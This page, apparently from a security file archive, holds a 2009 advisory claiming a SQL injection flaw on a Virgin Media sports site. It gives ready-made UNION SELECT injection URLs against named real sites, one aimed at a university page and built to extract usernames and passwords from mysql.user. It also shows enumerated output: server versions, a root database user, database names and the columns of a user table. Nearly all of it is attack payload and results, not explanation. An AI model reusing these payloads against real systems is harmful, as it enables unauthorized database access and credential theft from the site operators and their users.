Virgin Media SQL Injection

Virgin Media SQL Injection: Posted Jan 16, 2009; Authored by Rohit Bansal; Virginmedia.com suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 291f205f5342c194347333962f7d5e45d1e6b8449edb438053842ffc58a0a38c; Download | Favorite | View

Virgin Media SQL Injection

-----------------------------------------------------------------------------------------------

[+] Virginmedia.com suffers from a remote SQL injection vulnerability
[+] Author: Rohit Bansal

---------------------------------------------------------------------------------------
<https://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert%28concat%28user,0x3a,password%29%20using%20latin1%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+-->Host
Information

    Server = Apache/2.2.2 (Fedora)
    Version = 5.0.22-standard-log
    Powered by = PHP/5.1.6
    Current User = root@192.168.3.11
    Current Database = WorldSports2
    Supports Union = yes
    Union Columns = 10

Url| https://othersports.virginmedia.com/minorsports/news.php?id=25418

Vuln:
https://othersports.virginmedia.com/minorsports/news.php?id=25418+and+1=0+and
1=0 Union Select  1 ,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10

Comment: --

Visible Column: 3

Hexed: True

Cookie:

Keyword:

Param:

Database:mysql
    information_schema
    AFC1
    AusOpen
    ESPN_News
    ESPNdeportes
    EuropeanLeagues
    FAPL
    Greyhounds
    MatchLive2
    MatchLive_Cup
    OscarsQuizContent
    PABrits
    PAOscars
    PAShowbiz
    Platform
    QuizContent
    RolandGarros2007
    Rugby
    Three
    US_Sports
    WAPStats
    WorldCup
    WorldSports
    WorldSports2
    cricket
    mysql
    optus_tennis
    pa_tennis
    pccw_facup
    pslvodacom
    umusic
    universal
    us_open

Tables:user
    columns_priv
    db
    func
    help_category
    help_keyword
    help_relation
    help_topic
    host
    proc
    procs_priv
    tables_priv
    time_zone
    time_zone_leap_second
    time_zone_name
    time_zone_transition
    time_zone_transition_type
    user

Columns: Table user
    Username
    Password
    DateStamp
    Status
    userid
    name
    email
    location


---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec,Evilfinger
---------------------------------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Virgin Media SQL Injection

Virgin Media SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Virgin Media SQL Injection

Share This

Virgin Media SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems